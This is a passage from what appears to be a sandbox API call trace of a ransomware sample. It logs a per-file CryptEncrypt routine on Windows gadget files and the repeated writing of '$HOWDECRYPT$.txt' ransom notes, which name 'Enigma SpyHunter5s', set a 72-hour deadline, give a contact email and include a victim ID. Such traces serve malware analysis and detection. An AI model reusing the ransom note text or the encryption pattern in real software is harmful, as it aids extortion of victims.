dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.784] GetProcessHeap () returned 0x2c0000 [0160.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.784] GetProcessHeap () returned 0x2c0000 [0160.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee3e0 | out: hHeap=0x2c0000) returned 1 [0160.784] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce938 | out: pbBuffer=0x25ce938) returned 1 [0160.784] GetProcessHeap () returned 0x2c0000 [0160.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.784] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce930*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce930*=0x30) returned 1 [0160.785] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\32.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\32.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.790] GetProcessHeap () returned 0x2c0000 [0160.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.790] GetProcessHeap () returned 0x2c0000 [0160.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eedf58 | out: hHeap=0x2c0000) returned 1 [0160.790] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce938 | out: pbBuffer=0x25ce938) returned 1 [0160.790] GetProcessHeap () returned 0x2c0000 [0160.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.790] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce930*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce930*=0x30) returned 1 [0160.790] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\26.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\26.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.794] GetProcessHeap () returned 0x2c0000 [0160.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.794] GetProcessHeap () returned 0x2c0000 [0160.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed900 | out: hHeap=0x2c0000) returned 1 [0160.794] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce930 | out: pbBuffer=0x25ce930) returned 1 [0160.794] GetProcessHeap () returned 0x2c0000 [0160.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.794] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce928*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce928*=0x30) returned 1 [0160.794] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\22.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\22.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.798] GetProcessHeap () returned 0x2c0000 [0160.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.798] GetProcessHeap () returned 0x2c0000 [0160.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed560 | out: hHeap=0x2c0000) returned 1 [0160.798] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce930 | out: pbBuffer=0x25ce930) returned 1 [0160.798] GetProcessHeap () returned 0x2c0000 [0160.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.798] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce928*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce928*=0x30) returned 1 [0160.798] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\19.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\19.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.806] GetProcessHeap () returned 0x2c0000 [0160.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.806] GetProcessHeap () returned 0x2c0000 [0160.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed1c0 | out: hHeap=0x2c0000) returned 1 [0160.806] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce928 | out: pbBuffer=0x25ce928) returned 1 [0160.806] GetProcessHeap () returned 0x2c0000 [0160.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.806] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce920*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce920*=0x30) returned 1 [0160.806] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\144DPI\\(144DPI)grayStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\144dpi\\(144dpi)graystateicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.812] GetProcessHeap () returned 0x2c0000 [0160.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.812] GetProcessHeap () returned 0x2c0000 [0160.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c83b38 | out: hHeap=0x2c0000) returned 1 [0160.812] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce928 | out: pbBuffer=0x25ce928) returned 1 [0160.813] GetProcessHeap () returned 0x2c0000 [0160.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.813] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce920*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce920*=0x30) returned 1 [0160.813] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\120DPI\\(120DPI)notConnectedStateIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\120dpi\\(120dpi)notconnectedstateicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.821] GetProcessHeap () returned 0x2c0000 [0160.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.821] GetProcessHeap () returned 0x2c0000 [0160.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e88dc8 | out: hHeap=0x2c0000) returned 1 [0160.821] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce920 | out: pbBuffer=0x25ce920) returned 1 [0160.821] GetProcessHeap () returned 0x2c0000 [0160.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.821] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ce918*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ce918*=0x30) returned 1 [0160.821] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\10.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.825] GetProcessHeap () returned 0x2c0000 [0160.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.825] GetProcessHeap () returned 0x2c0000 [0160.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eec998 | out: hHeap=0x2c0000) returned 1 [0160.825] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.851] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.851] WriteFile (in: hFile=0x178, lpBuffer=0x25ce853*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce97c, lpOverlapped=0x0 | out: lpBuffer=0x25ce853*, lpNumberOfBytesWritten=0x25ce97c*=0x127, lpOverlapped=0x0) returned 1 [0160.851] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.851] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce97c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce97c*=0x2ac, lpOverlapped=0x0) returned 1 [0160.852] CloseHandle (hObject=0x178) returned 1 [0160.852] GetProcessHeap () returned 0x2c0000 [0160.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f43a28 | out: hHeap=0x2c0000) returned 1 [0160.852] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce918 | out: pbBuffer=0x25ce918) returned 1 [0160.852] GetProcessHeap () returned 0x2c0000 [0160.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.852] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce910*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce910*=0x30) returned 1 [0160.852] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Tulip.jpg" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\tulip.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.877] GetProcessHeap () returned 0x2c0000 [0160.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.880] GetProcessHeap () returned 0x2c0000 [0160.880] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3c848 | out: hHeap=0x2c0000) returned 1 [0160.880] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce918 | out: pbBuffer=0x25ce918) returned 1 [0160.881] GetProcessHeap () returned 0x2c0000 [0160.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.881] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce910*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce910*=0x30) returned 1 [0160.881] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\play_rest.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\play_rest.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.889] GetProcessHeap () returned 0x2c0000 [0160.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.891] GetProcessHeap () returned 0x2c0000 [0160.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f43228 | out: hHeap=0x2c0000) returned 1 [0160.891] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\on_desktop\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\on_desktop\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.907] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.908] WriteFile (in: hFile=0x178, lpBuffer=0x25ce847*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce970, lpOverlapped=0x0 | out: lpBuffer=0x25ce847*, lpNumberOfBytesWritten=0x25ce970*=0x127, lpOverlapped=0x0) returned 1 [0160.911] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.911] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce970, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce970*=0x2ac, lpOverlapped=0x0) returned 1 [0160.911] CloseHandle (hObject=0x178) returned 1 [0160.911] GetProcessHeap () returned 0x2c0000 [0160.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3dea8 | out: hHeap=0x2c0000) returned 1 [0160.912] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce910 | out: pbBuffer=0x25ce910) returned 1 [0160.912] GetProcessHeap () returned 0x2c0000 [0160.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.912] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce908*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce908*=0x30) returned 1 [0160.912] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\icon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.920] GetProcessHeap () returned 0x2c0000 [0160.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.920] GetProcessHeap () returned 0x2c0000 [0160.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eec6e0 | out: hHeap=0x2c0000) returned 1 [0160.920] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\js\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.935] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.935] WriteFile (in: hFile=0x178, lpBuffer=0x25ce83f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce968, lpOverlapped=0x0 | out: lpBuffer=0x25ce83f*, lpNumberOfBytesWritten=0x25ce968*=0x127, lpOverlapped=0x0) returned 1 [0160.936] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.936] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce968, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce968*=0x2ac, lpOverlapped=0x0) returned 1 [0160.936] CloseHandle (hObject=0x178) returned 1 [0160.936] GetProcessHeap () returned 0x2c0000 [0160.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f41040 | out: hHeap=0x2c0000) returned 1 [0160.936] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce908 | out: pbBuffer=0x25ce908) returned 1 [0160.936] GetProcessHeap () returned 0x2c0000 [0160.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.936] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce900*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce900*=0x30) returned 1 [0160.936] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\js\\slideShow.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\js\\slideshow.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.937] GetProcessHeap () returned 0x2c0000 [0160.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.937] GetProcessHeap () returned 0x2c0000 [0160.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb16b8 | out: hHeap=0x2c0000) returned 1 [0160.937] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce900 | out: pbBuffer=0x25ce900) returned 1 [0160.937] GetProcessHeap () returned 0x2c0000 [0160.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.937] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ce8f8*=0x30) returned 1 [0160.937] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\gadget.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.937] GetProcessHeap () returned 0x2c0000 [0160.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.937] GetProcessHeap () returned 0x2c0000 [0160.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3c278 | out: hHeap=0x2c0000) returned 1 [0160.937] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\en-US\\css\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\en-us\\css\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.938] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.938] WriteFile (in: hFile=0x178, lpBuffer=0x25ce833*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce95c, lpOverlapped=0x0 | out: lpBuffer=0x25ce833*, lpNumberOfBytesWritten=0x25ce95c*=0x127, lpOverlapped=0x0) returned 1 [0160.939] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.939] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce95c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce95c*=0x2ac, lpOverlapped=0x0) returned 1 [0160.939] CloseHandle (hObject=0x178) returned 1 [0160.939] GetProcessHeap () returned 0x2c0000 [0160.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f40f38 | out: hHeap=0x2c0000) returned 1 [0160.939] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce8f8 | out: pbBuffer=0x25ce8f8) returned 1 [0160.939] GetProcessHeap () returned 0x2c0000 [0160.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.939] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ce8f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, 